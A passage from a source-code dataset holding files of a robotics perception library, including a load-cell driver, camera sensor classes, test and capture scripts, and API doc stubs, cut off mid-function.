"text": "\"\"\"Wrapper class for weight sensor.\"\"\"\nimport glob\nimport threading\nimport time\n\nimport numpy as np\nimport serial\nfrom autolab_core import Logger\nfrom scipy import signal\n\nfrom .constants import LBS_TO_GRAMS\n\n\nclass WeightSensor(object):\n \"\"\"Driver for weight sensors.\"\"\"\n\n def __init__(self, id_mask=\"F1804\", ntaps=4, log=True):\n \"\"\"Initialize the weight sensor.\n\n Parameters\n ----------\n id_mask : str\n A template for the first n digits of the device IDs\n for valid load cells.\n ntaps : int\n Maximum number of samples to perform filtering over.\n log : bool\n Use a logger\n \"\"\"\n self._id_mask = id_mask\n self._ntaps = ntaps\n self._filter_coeffs = signal.firwin(ntaps, 0.1)\n self._running = False\n self._cur_weights = None\n self._read_thread = None\n self._write_lock = threading.Condition()\n self.logger = Logger.get_logger(\"WeightSensor\") if log else None\n\n def start(self):\n \"\"\"Start the sensor\n (connect and start thread for reading weight values)\n \"\"\"\n\n if self._running:\n return\n self._serials = self._connect(self._id_mask)\n if len(self._serials) == 0:\n raise ValueError(\n \"Error -- No loadstar weight sensors connected to machine!\"\n )\n\n # Flush the sensor's communications\n self._flush()\n self._running = True\n\n # Start thread for reading weight sensor\n self._read_thread = threading.Thread(\n target=self._read_weights, daemon=True\n )\n self._read_thread.start()\n\n def stop(self):\n \"\"\"Stop the sensor.\"\"\"\n if not self._running:\n return\n self._running = False\n self._read_thread.join()\n self._serials = None\n self._read_thread = None\n\n def reset(self):\n \"\"\"Starts and stops the sensor\"\"\"\n self.stop()\n self.start()\n\n def _connect(self, id_mask):\n \"\"\"Connects to all of the load cells serially.\"\"\"\n # Get all devices attached as USB serial\n all_devices = glob.glob(\"/dev/ttyUSB*\")\n\n # Identify which of the devices are LoadStar Serial Sensors\n sensors = []\n for device in all_devices:\n try:\n ser = serial.Serial(port=device, timeout=0.5, exclusive=True)\n ser.write(\"ID\\r\".encode())\n time.sleep(0.05)\n resp = ser.read(13).decode()\n ser.close()\n\n if len(resp) >= 10 and resp[: len(id_mask)] == id_mask:\n sensors.append((device, resp.rstrip(\"\\r\\n\")))\n except (serial.SerialException, serial.SerialTimeoutException):\n continue\n sensors = sorted(sensors, key=lambda x: x[1])\n\n # Connect to each of the serial devices\n serials = []\n for device, key in sensors:\n ser = serial.Serial(port=device, timeout=0.5)\n serials.append(ser)\n if self.logger is not None:\n self.logger.info(\n \"Connected to load cell {} at {}\".format(key, device)\n )\n return serials\n\n def _flush(self):\n \"\"\"Flushes all of the serial ports.\"\"\"\n for ser in self._serials:\n ser.flush()\n ser.flushInput()\n ser.flushOutput()\n time.sleep(0.02)\n\n def tare(self):\n \"\"\"Zeros out (tare) all of the load cells.\"\"\"\n with self._write_lock:\n self._write_lock.wait()\n for ser in self._serials:\n ser.write(\"TARE\\r\".encode())\n ser.flush()\n ser.flushInput()\n ser.flushOutput()\n time.sleep(0.02)\n if self.logger is not None:\n self.logger.info(\"Tared sensor\")\n\n def read(self):\n if not self._running:\n raise ValueError(\"Weight sensor is not running!\")\n while self._cur_weights is None:\n pass\n return self._cur_weights\n\n def _read_weights(self):\n weights_buffer = []\n while self._running:\n with self._write_lock:\n if len(weights_buffer) == self._ntaps:\n weights_buffer.pop(0)\n weights_buffer.append(self._raw_weights())\n if len(weights_buffer) < self._ntaps:\n self._cur_weights = np.mean(weights_buffer, axis=0)\n else:\n self._cur_weights = self._filter_coeffs.dot(weights_buffer)\n self._write_lock.notify()\n time.sleep(0.005)\n\n def _raw_weights(self):\n \"\"\"Reads weights from each of the load cells.\"\"\"\n weights = []\n\n # Read from each of the sensors\n for ser in self._serials:\n ser.write(\"W\\r\".encode())\n ser.flush()\n time.sleep(0.02)\n for ser in self._serials:\n try:\n output_str = ser.readline().decode()\n weight = float(output_str) * LBS_TO_GRAMS\n weights.append(weight)\n except (serial.SerialException, ValueError):\n weights.append(0.0)\n\n # Log the output\n if self.logger is not None:\n log_output = \"\"\n for w in weights:\n log_output += \"{:.2f} \".format(w)\n self.logger.debug(log_output)\n\n return weights\n\n def __del__(self):\n self.stop()\n"
},
{
"alpha_fraction": 0.6741573214530945,
"alphanum_fraction": 0.6741573214530945,
"avg_line_length": 22.421052932739258,
"blob_id": "a8bd9bbfbe80d96b5f6fecd05159174cdf26f7d7",
"content_id": "bd93d2329f972e9331c43d524bdee1bcf5180791",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 445,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 19,
"path": "/docs/source/api/registration.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Point Cloud Registration\n========================\nClasses for point cloud registration.\n\nIterativeRegistrationSolver\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\nAbstract class for iterative point cloud registration algorithms.\n\n.. autoclass:: perception.IterativeRegistrationSolver\n\nRegistrationResult\n~~~~~~~~~~~~~~~~~~\n.. autoclass:: perception.RegistrationResult\n\n\nPointToPlaneICPSolver\n~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.PointToPlaneICPSolver\n"
},
{
"alpha_fraction": 0.5876288414001465,
"alphanum_fraction": 0.5876288414001465,
"avg_line_length": 15.166666984558105,
"blob_id": "8e90f0b65449a70ce771bbe56bfeb3b00bb47e75",
"content_id": "9ac8444794c94a55c13e4ffec1a5cefc90f45d23",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 97,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 6,
"path": "/docs/source/api/video.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Video Classes\n=============\n\nVideoRecorder\n~~~~~~~~~~~~~\n.. autoclass:: perception.VideoRecorder\n"
},
{
"alpha_fraction": 0.525560200214386,
"alphanum_fraction": 0.5392156839370728,
"avg_line_length": 31.827587127685547,
"blob_id": "377253dcacfa3c065576f0d5f51a83953e21e01b",
"content_id": "e12a4bee13445f874f7dcde29b19b1b9e31a825e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2856,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 87,
"path": "/tests/test_rgbd_sensors.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "import os\nimport unittest\n\nimport numpy as np\nfrom autolab_core import CameraIntrinsics, ColorImage, DepthImage\n\nfrom perception import RgbdSensorFactory\n\nIM_FILEROOT = \"tests/data\"\n\n\nclass TestRgbdSensors(unittest.TestCase):\n def test_virtual(self, height=100, width=100):\n # Generate folder of color and depth images\n if not os.path.exists(IM_FILEROOT):\n os.makedirs(IM_FILEROOT)\n cam_intr = CameraIntrinsics(\n \"a\",\n fx=0.0,\n fy=0.0,\n cx=0.0,\n cy=0.0,\n skew=0.0,\n height=100,\n width=100,\n )\n cam_intr.save(os.path.join(IM_FILEROOT, \"a.intr\"))\n color_data = (255 * np.random.rand(10, height, width, 3)).astype(\n np.uint8\n )\n depth_data = np.random.rand(10, height, width).astype(np.float32)\n for i in range(10):\n im = ColorImage(color_data[i], frame=\"a\")\n im.save(os.path.join(IM_FILEROOT, \"color_{:d}.png\".format(i)))\n\n im = DepthImage(depth_data[i], frame=\"a\")\n im.save(os.path.join(IM_FILEROOT, \"depth_{:d}.npy\".format(i)))\n\n # Create virtual camera\n virtual_cam = RgbdSensorFactory.sensor(\n \"virtual\", cfg={\"image_dir\": IM_FILEROOT, \"frame\": \"a\"}\n )\n self.assertTrue(\n virtual_cam.path_to_images == IM_FILEROOT,\n msg=\"img path changed after init\",\n )\n\n # Start virtual camera and read frames\n virtual_cam.start()\n self.assertTrue(\n virtual_cam.is_running, msg=\"camera not running after start\"\n )\n for i in range(10):\n color, depth = virtual_cam.frames()\n self.assertTrue(\n np.all(color.data == color_data[i]),\n msg=\"color data for img {:d} changed\".format(i),\n )\n self.assertTrue(\n color.frame == virtual_cam.frame,\n msg=\"frame mismatch between color im and camera\",\n )\n self.assertTrue(\n np.all(depth.data == depth_data[i]),\n msg=\"depth data for img {:d} changed\".format(i),\n )\n self.assertTrue(\n depth.frame == virtual_cam.frame,\n msg=\"frame mismatch between depth im and camera\",\n )\n\n # Make sure camera is stopped\n virtual_cam.stop()\n self.assertFalse(\n virtual_cam.is_running, msg=\"camera running after stop\"\n )\n\n # Cleanup images\n for i in range(10):\n os.remove(os.path.join(IM_FILEROOT, \"color_{:d}.png\".format(i)))\n os.remove(os.path.join(IM_FILEROOT, \"depth_{:d}.npy\".format(i)))\n os.remove(os.path.join(IM_FILEROOT, \"a.intr\"))\n os.rmdir(IM_FILEROOT)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.592930793762207,
"alphanum_fraction": 0.6085419654846191,
"avg_line_length": 28.044248580932617,
"blob_id": "80fa35df39980ba16a0331bec9a445e60a9a9144",
"content_id": "f72687bbe40f6083e8dd9932bd1e8a8728576b1a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3395,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 113,
"path": "/tools/register_object.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nScript to register an object in world frame provided transform\r\nfrom cam to cb and from obj to cb\r\nAuthor: Jacky\r\n\"\"\"\r\nimport argparse\r\nimport logging\r\nimport os\r\n\r\nimport trimesh\r\nfrom autolab_core import (\r\n CameraChessboardRegistration,\r\n RigidTransform,\r\n YamlConfig,\r\n)\r\n\r\nfrom perception import RgbdSensorFactory\r\n\r\nVIS_SUPPORTED = True\r\ntry:\r\n from visualization import Visualizer3D as vis\r\nexcept ImportError:\r\n logging.warning(\r\n \"Failed to import visualization package. Visualization disabled\"\r\n )\r\n VIS_SUPPORTED = False\r\n\r\nif __name__ == \"__main__\":\r\n logging.getLogger().setLevel(logging.INFO)\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"object_name\")\r\n args = parser.parse_args()\r\n\r\n config_filename = \"cfg/tools/register_object.yaml\"\r\n config = YamlConfig(config_filename)\r\n\r\n sensor_frame = config[\"sensor\"][\"frame_name\"]\r\n sensor_type = config[\"sensor\"][\"type\"]\r\n sensor_config = config[\"sensor\"]\r\n\r\n object_path = os.path.join(config[\"objects_dir\"], args.object_name)\r\n obj_cb_transform_file_path = os.path.join(\r\n object_path, \"T_cb_{0}.tf\".format(args.object_name)\r\n )\r\n\r\n # load T_cb_obj\r\n T_cb_obj = RigidTransform.load(obj_cb_transform_file_path)\r\n\r\n # load T_world_cam\r\n T_world_cam_path = os.path.join(\r\n config[\"calib_dir\"],\r\n sensor_frame,\r\n \"{0}_to_world.tf\".format(sensor_frame),\r\n )\r\n T_world_cam = RigidTransform.load(T_world_cam_path)\r\n\r\n # open sensor\r\n sensor_type = sensor_config[\"type\"]\r\n sensor_config[\"frame\"] = sensor_frame\r\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\r\n logging.info(\"Starting sensor\")\r\n sensor.start()\r\n ir_intrinsics = sensor.ir_intrinsics\r\n logging.info(\"Sensor initialized\")\r\n\r\n # register\r\n reg_result = CameraChessboardRegistration.register(\r\n sensor, config[\"chessboard_registration\"]\r\n )\r\n\r\n T_cb_cam = reg_result.T_camera_cb\r\n T_world_obj = T_world_cam * T_cb_cam.inverse() * T_cb_obj\r\n\r\n output_path = os.path.join(config[\"calib_dir\"], T_world_obj.from_frame)\r\n if not os.path.exists(output_path):\r\n os.makedirs(output_path)\r\n\r\n output_filename = os.path.join(\r\n output_path, \"{0}_to_world.tf\".format(T_world_obj.from_frame)\r\n )\r\n logging.info(T_world_obj)\r\n T_world_obj.save(output_filename)\r\n\r\n if config[\"vis\"] and VIS_SUPPORTED:\r\n\r\n _, depth_im, _ = sensor.frames()\r\n pc_cam = ir_intrinsics.deproject(depth_im)\r\n pc_world = T_world_cam * pc_cam\r\n\r\n mesh = trimesh.load(\r\n os.path.join(object_path, \"{0}.obj\".format(args.object_name))\r\n )\r\n\r\n vis.figure(bgcolor=(0.7, 0.7, 0.7))\r\n vis.mesh(mesh, T_world_obj.as_frames(\"obj\", \"world\"), style=\"surface\")\r\n vis.pose(T_world_obj, alpha=0.04, tube_radius=0.002, center_scale=0.01)\r\n vis.pose(\r\n RigidTransform(from_frame=\"origin\"),\r\n alpha=0.04,\r\n tube_radius=0.002,\r\n center_scale=0.01,\r\n )\r\n vis.pose(T_world_cam, alpha=0.04, tube_radius=0.002, center_scale=0.01)\r\n vis.pose(\r\n T_world_cam * T_cb_cam.inverse(),\r\n alpha=0.04,\r\n tube_radius=0.002,\r\n center_scale=0.01,\r\n )\r\n vis.points(pc_world, subsample=20)\r\n vis.show()\r\n sensor.stop()\r\n"
},
{
"alpha_fraction": 0.5582504868507385,
"alphanum_fraction": 0.5632206797599792,
"avg_line_length": 32.092105865478516,
"blob_id": "9c487684f9020f3ea6a1a8ed6f0e98b7e9f73294",
"content_id": "6718bc149cf3486417b486b4f605ea94f70a366f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5030,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 152,
"path": "/tools/capture_test_images.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nScript to capture a set of test images.\nBe sure to register camera beforehand!!!\nAuthor: Jeff Mahler\n\"\"\"\nimport argparse\nimport os\n\nimport autolab_core.utils as utils\nimport numpy as np\nimport rospy\nfrom autolab_core import Box, Logger, RigidTransform, YamlConfig\n\nfrom perception import RgbdSensorFactory\n\n# set up logger\nlogger = Logger.get_logger(\"tools/capture_test_images.py\")\n\nif __name__ == \"__main__\":\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Capture a set of RGB-D images from a set of sensors\"\n )\n parser.add_argument(\n \"output_dir\", type=str, help=\"path to save captured images\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/capture_test_images.yaml\",\n help=\"path to configuration file to use\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n output_dir = args.output_dir\n\n # read config\n config = YamlConfig(config_filename)\n vis = config[\"vis\"]\n\n # make output dir if needed\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n # read rescale factor\n rescale_factor = 1.0\n if \"rescale_factor\" in config.keys():\n rescale_factor = config[\"rescale_factor\"]\n\n # read workspace bounds\n workspace = None\n if \"workspace\" in config.keys():\n workspace = Box(\n np.array(config[\"workspace\"][\"min_pt\"]),\n np.array(config[\"workspace\"][\"max_pt\"]),\n frame=\"world\",\n )\n\n # init ros node\n rospy.init_node(\n \"capture_test_images\"\n ) # NOTE: this is required by the camera sensor classes\n Logger.reconfigure_root()\n\n for sensor_name, sensor_config in config[\"sensors\"].iteritems():\n logger.info(\"Capturing images from sensor %s\" % (sensor_name))\n save_dir = os.path.join(output_dir, sensor_name)\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n\n # read params\n sensor_type = sensor_config[\"type\"]\n sensor_frame = sensor_config[\"frame\"]\n\n # read camera calib\n tf_filename = \"%s_to_world.tf\" % (sensor_frame)\n T_camera_world = RigidTransform.load(\n os.path.join(config[\"calib_dir\"], sensor_frame, tf_filename)\n )\n T_camera_world.save(os.path.join(save_dir, tf_filename))\n\n # setup sensor\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\n\n # start the sensor\n sensor.start()\n camera_intr = sensor.ir_intrinsics\n camera_intr.save(os.path.join(save_dir, \"%s.intr\" % (sensor.frame)))\n\n # get raw images\n for i in range(sensor_config[\"num_images\"]):\n logger.info(\"Capturing image %d\" % (i))\n message = \"Hit ENTER when ready.\"\n utils.keyboard_input(message=message)\n\n # read images\n color, depth, ir = sensor.frames()\n\n # save processed images\n if workspace is not None:\n # deproject into 3D world coordinates\n point_cloud_cam = camera_intr.deproject(depth)\n point_cloud_cam.remove_zero_points()\n point_cloud_world = T_camera_world * point_cloud_cam\n\n # segment out the region in the workspace (objects only)\n seg_point_cloud_world, _ = point_cloud_world.box_mask(\n workspace\n )\n\n # compute the segmask for points above the box\n seg_point_cloud_cam = (\n T_camera_world.inverse() * seg_point_cloud_world\n )\n depth_im_seg = camera_intr.project_to_image(\n seg_point_cloud_cam\n )\n segmask = depth_im_seg.to_binary()\n\n # rescale segmask\n if rescale_factor != 1.0:\n segmask = segmask.resize(rescale_factor, interp=\"nearest\")\n\n # save segmask\n segmask.save(os.path.join(save_dir, \"segmask_%d.png\" % (i)))\n\n # rescale images\n if rescale_factor != 1.0:\n color = color.resize(rescale_factor)\n depth = depth.resize(rescale_factor, interp=\"nearest\")\n\n # save images\n color.save(os.path.join(save_dir, \"color_%d.png\" % (i)))\n depth.save(os.path.join(save_dir, \"depth_%d.npy\" % (i)))\n if ir is not None:\n ir.save(os.path.join(save_dir, \"ir_%d.npy\" % (i)))\n\n if vis:\n from visualization import Visualizer2D as vis2d\n\n num_plots = 3 if workspace is not None else 2\n vis2d.figure()\n vis2d.subplot(1, num_plots, 1)\n vis2d.imshow(color)\n vis2d.subplot(1, num_plots, 2)\n vis2d.imshow(depth)\n if workspace is not None:\n vis2d.subplot(1, num_plots, 3)\n vis2d.imshow(segmask)\n vis2d.show()\n\n sensor.stop()\n"
},
{
"alpha_fraction": 0.630094051361084,
"alphanum_fraction": 0.6520376205444336,
"avg_line_length": 20.200000762939453,
"blob_id": "9e39bb70fbb393c1af4ad036eae71f20a7227f7b",
"content_id": "5598f90ab280612393569ae8e52a1c3a1e96c9b0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 319,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 15,
"path": "/docs/source/api/kinect_sensor.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Kinect Sensor\n=============\nInterfaces for the Kinect 2 RGBD sesnor.\n\nKinect2Sensor\n~~~~~~~~~~~~~\n.. autoclass:: perception.Kinect2Sensor\n\nVirtualKinect2Sensor\n~~~~~~~~~~~~~~~~~~~~\n.. autoclass:: perception.VirtualKinect2Sensor\n\nKinect2SensorFactory\n~~~~~~~~~~~~~~~~~~~~\n.. autoclass:: perception.Kinect2SensorFactory\n\n"
},
{
"alpha_fraction": 0.6821561455726624,
"alphanum_fraction": 0.6821561455726624,
"avg_line_length": 21.41666603088379,
"blob_id": "850459b5a5e6df228838bfef68d96d51f2818ab7",
"content_id": "8fc17abef2f9176cd4f71b67427517299bb57e39",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 538,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 24,
"path": "/docs/source/api/detector.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Detection\n=========\nClasses for finding a set of bounding boxes around objects of interest in an image.\n\nRgbdDetector\n~~~~~~~~~~~~\nAbstract class for detection from an RGBD image.\n\n.. autoclass:: perception.RgbdDetector\n\nRgbdDetection\n~~~~~~~~~~~~~\n.. autoclass:: perception.RgbdDetection\n\n\nRgbdForegroundMaskDetector\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.RgbdForegroundMaskDetector\n\nRgbdForegroundMaskQueryImageDetector\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.RgbdForegroundMaskQueryImageDetector\n"
},
{
"alpha_fraction": 0.6099706888198853,
"alphanum_fraction": 0.6138807535171509,
"avg_line_length": 23.35714340209961,
"blob_id": "5805040c5b821d1db2bc5a3dc00afb0065633f4c",
"content_id": "4edf97c4b002f9d4d6698b909ce24ae24806c244",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1023,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 42,
"path": "/tools/test_realsense.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport pyrealsense2 as rs\n\nfrom perception import RgbdSensorFactory\n\n\ndef discover_cams():\n \"\"\"Returns a list of the ids of all cameras connected via USB.\"\"\"\n ctx = rs.context()\n ctx_devs = list(ctx.query_devices())\n ids = []\n for i in range(ctx.devices.size()):\n ids.append(ctx_devs[i].get_info(rs.camera_info.serial_number))\n return ids\n\n\ndef main():\n ids = discover_cams()\n assert ids, \"[!] No camera detected.\"\n\n cfg = {}\n cfg[\"cam_id\"] = ids[0]\n cfg[\"filter_depth\"] = True\n cfg[\"frame\"] = \"realsense_overhead\"\n\n sensor = RgbdSensorFactory.sensor(\"realsense\", cfg)\n sensor.start()\n camera_intr = sensor.color_intrinsics\n color_im, depth_im, _ = sensor.frames()\n sensor.stop()\n\n print(\"intrinsics matrix: {}\".format(camera_intr.K))\n\n _, axes = plt.subplots(1, 2)\n for ax, im in zip(axes, [color_im.data, depth_im.data]):\n ax.imshow(im)\n ax.axis(\"off\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.551014244556427,
"alphanum_fraction": 0.5579433441162109,
"avg_line_length": 29.54601287841797,
"blob_id": "23b5b8c7052dbfbf079b9424c7ae772d2e34697d",
"content_id": "7f15f021a730baf3dde735b40e4fce24ff2a83f4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9958,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 326,
"path": "/perception/primesense_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClass for interfacing with the Primesense Carmine RGBD sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\n\nimport numpy as np\nfrom autolab_core import CameraIntrinsics, ColorImage, DepthImage, Image\nfrom autolab_core.constants import MM_TO_METERS\nfrom primesense import openni2\n\nfrom .camera_sensor import CameraSensor\n\n\nclass PrimesenseRegistrationMode:\n \"\"\"Primesense registration mode.\"\"\"\n\n NONE = 0\n DEPTH_TO_COLOR = 1\n\n\nclass PrimesenseSensor(CameraSensor):\n \"\"\"Class for interacting with a Primesense RGBD sensor.\"\"\"\n\n # Constants for image height and width (in case they're needed somewhere)\n COLOR_IM_HEIGHT = 480\n COLOR_IM_WIDTH = 640\n DEPTH_IM_HEIGHT = 480\n DEPTH_IM_WIDTH = 640\n CENTER_X = float(DEPTH_IM_WIDTH - 1) / 2.0\n CENTER_Y = float(DEPTH_IM_HEIGHT - 1) / 2.0\n FOCAL_X = 525.0\n FOCAL_Y = 525.0\n FPS = 30\n OPENNI2_PATH = \"/home/autolab/Libraries/OpenNI-Linux-x64-2.2/Redist\"\n\n def __init__(\n self,\n registration_mode=PrimesenseRegistrationMode.DEPTH_TO_COLOR,\n auto_white_balance=False,\n auto_exposure=True,\n enable_depth_color_sync=True,\n flip_images=True,\n frame=None,\n ):\n self._device = None\n self._depth_stream = None\n self._color_stream = None\n self._running = None\n\n self._registration_mode = registration_mode\n self._auto_white_balance = auto_white_balance\n self._auto_exposure = auto_exposure\n self._enable_depth_color_sync = enable_depth_color_sync\n self._flip_images = flip_images\n\n self._frame = frame\n\n if self._frame is None:\n self._frame = \"primesense\"\n self._color_frame = \"{}_color\".format(self._frame)\n self._ir_frame = (\n self._frame\n ) # same as color since we normally use this one\n\n def __del__(self):\n \"\"\"Automatically stop the sensor for safety.\"\"\"\n if self.is_running:\n self.stop()\n\n @property\n def color_intrinsics(self):\n \"\"\":obj:`CameraIntrinsics` : Color camera intrinsics of primesense.\"\"\"\n return CameraIntrinsics(\n self._ir_frame,\n PrimesenseSensor.FOCAL_X,\n PrimesenseSensor.FOCAL_Y,\n PrimesenseSensor.CENTER_X,\n PrimesenseSensor.CENTER_Y,\n height=PrimesenseSensor.DEPTH_IM_HEIGHT,\n width=PrimesenseSensor.DEPTH_IM_WIDTH,\n )\n\n @property\n def ir_intrinsics(self):\n \"\"\":obj:`CameraIntrinsics` : IR camera intrinsics of primesense.\"\"\"\n return CameraIntrinsics(\n self._ir_frame,\n PrimesenseSensor.FOCAL_X,\n PrimesenseSensor.FOCAL_Y,\n PrimesenseSensor.CENTER_X,\n PrimesenseSensor.CENTER_Y,\n height=PrimesenseSensor.DEPTH_IM_HEIGHT,\n width=PrimesenseSensor.DEPTH_IM_WIDTH,\n )\n\n @property\n def is_running(self):\n \"\"\"bool : True if the stream is running, or false otherwise.\"\"\"\n return self._running\n\n @property\n def frame(self):\n \"\"\":obj:`str` : The reference frame of the sensor.\"\"\"\n return self._frame\n\n @property\n def color_frame(self):\n \"\"\":obj:`str` : The reference frame of the color sensor.\"\"\"\n return self._color_frame\n\n @property\n def ir_frame(self):\n \"\"\":obj:`str` : The reference frame of the IR sensor.\"\"\"\n return self._ir_frame\n\n def start(self):\n \"\"\"Start the sensor\"\"\"\n # open device\n openni2.initialize(PrimesenseSensor.OPENNI2_PATH)\n self._device = openni2.Device.open_any()\n\n # open depth stream\n self._depth_stream = self._device.create_depth_stream()\n self._depth_stream.configure_mode(\n PrimesenseSensor.DEPTH_IM_WIDTH,\n PrimesenseSensor.DEPTH_IM_HEIGHT,\n PrimesenseSensor.FPS,\n openni2.PIXEL_FORMAT_DEPTH_1_MM,\n )\n self._depth_stream.start()\n\n # open color stream\n self._color_stream = self._device.create_color_stream()\n self._color_stream.configure_mode(\n PrimesenseSensor.COLOR_IM_WIDTH,\n PrimesenseSensor.COLOR_IM_HEIGHT,\n PrimesenseSensor.FPS,\n openni2.PIXEL_FORMAT_RGB888,\n )\n self._color_stream.camera.set_auto_white_balance(\n self._auto_white_balance\n )\n self._color_stream.camera.set_auto_exposure(self._auto_exposure)\n self._color_stream.start()\n\n # configure device\n if (\n self._registration_mode\n == PrimesenseRegistrationMode.DEPTH_TO_COLOR\n ):\n self._device.set_image_registration_mode(\n openni2.IMAGE_REGISTRATION_DEPTH_TO_COLOR\n )\n else:\n self._device.set_image_registration_mode(\n openni2.IMAGE_REGISTRATION_OFF\n )\n\n self._device.set_depth_color_sync_enabled(\n self._enable_depth_color_sync\n )\n\n self._running = True\n\n def stop(self):\n \"\"\"Stop the sensor\"\"\"\n # check that everything is running\n if not self._running or self._device is None:\n logging.warning(\"Primesense not running. Aborting stop\")\n return False\n\n # stop streams\n if self._depth_stream:\n self._depth_stream.stop()\n if self._color_stream:\n self._color_stream.stop()\n self._running = False\n\n # Unload openni2\n openni2.unload()\n return True\n\n def _read_depth_image(self):\n \"\"\"Reads a depth image from the device\"\"\"\n # read raw uint16 buffer\n im_arr = self._depth_stream.read_frame()\n raw_buf = im_arr.get_buffer_as_uint16()\n buf_array = np.array(\n [\n raw_buf[i]\n for i in range(\n PrimesenseSensor.DEPTH_IM_WIDTH\n * PrimesenseSensor.DEPTH_IM_HEIGHT\n )\n ]\n )\n\n # convert to image in meters\n depth_image = buf_array.reshape(\n PrimesenseSensor.DEPTH_IM_HEIGHT, PrimesenseSensor.DEPTH_IM_WIDTH\n )\n depth_image = depth_image * MM_TO_METERS # convert to meters\n if self._flip_images:\n depth_image = np.flipud(depth_image)\n else:\n depth_image = np.fliplr(depth_image)\n return DepthImage(depth_image, frame=self._frame)\n\n def _read_color_image(self):\n \"\"\"Reads a color image from the device\"\"\"\n # read raw buffer\n im_arr = self._color_stream.read_frame()\n raw_buf = im_arr.get_buffer_as_triplet()\n r_array = np.array(\n [\n raw_buf[i][0]\n for i in range(\n PrimesenseSensor.COLOR_IM_WIDTH\n * PrimesenseSensor.COLOR_IM_HEIGHT\n )\n ]\n )\n g_array = np.array(\n [\n raw_buf[i][1]\n for i in range(\n PrimesenseSensor.COLOR_IM_WIDTH\n * PrimesenseSensor.COLOR_IM_HEIGHT\n )\n ]\n )\n b_array = np.array(\n [\n raw_buf[i][2]\n for i in range(\n PrimesenseSensor.COLOR_IM_WIDTH\n * PrimesenseSensor.COLOR_IM_HEIGHT\n )\n ]\n )\n\n # convert to uint8 image\n color_image = np.zeros(\n [\n PrimesenseSensor.COLOR_IM_HEIGHT,\n PrimesenseSensor.COLOR_IM_WIDTH,\n 3,\n ]\n )\n color_image[:, :, 0] = r_array.reshape(\n PrimesenseSensor.COLOR_IM_HEIGHT, PrimesenseSensor.COLOR_IM_WIDTH\n )\n color_image[:, :, 1] = g_array.reshape(\n PrimesenseSensor.COLOR_IM_HEIGHT, PrimesenseSensor.COLOR_IM_WIDTH\n )\n color_image[:, :, 2] = b_array.reshape(\n PrimesenseSensor.COLOR_IM_HEIGHT, PrimesenseSensor.COLOR_IM_WIDTH\n )\n if self._flip_images:\n color_image = np.flipud(color_image.astype(np.uint8))\n else:\n color_image = np.fliplr(color_image.astype(np.uint8))\n return ColorImage(color_image, frame=self._frame)\n\n def frames(self):\n \"\"\"Retrieve a new frame from the Kinect and convert it to a\n ColorImage and a DepthImage.\n\n Returns\n -------\n :obj:`tuple` of :obj:`ColorImage`, :obj:`DepthImage`\n The ColorImage and DepthImage of the current frame.\n\n Raises\n ------\n RuntimeError\n If the Kinect stream is not running.\n \"\"\"\n color_im = self._read_color_image()\n depth_im = self._read_depth_image()\n return color_im, depth_im\n\n def median_depth_img(self, num_img=1, fill_depth=0.0):\n \"\"\"Collect a series of depth images and return the median of the set.\n\n Parameters\n ----------\n num_img : int\n The number of consecutive frames to process.\n\n Returns\n -------\n :obj:`DepthImage`\n The median DepthImage collected from the frames.\n \"\"\"\n depths = []\n\n for _ in range(num_img):\n _, depth, _ = self.frames()\n 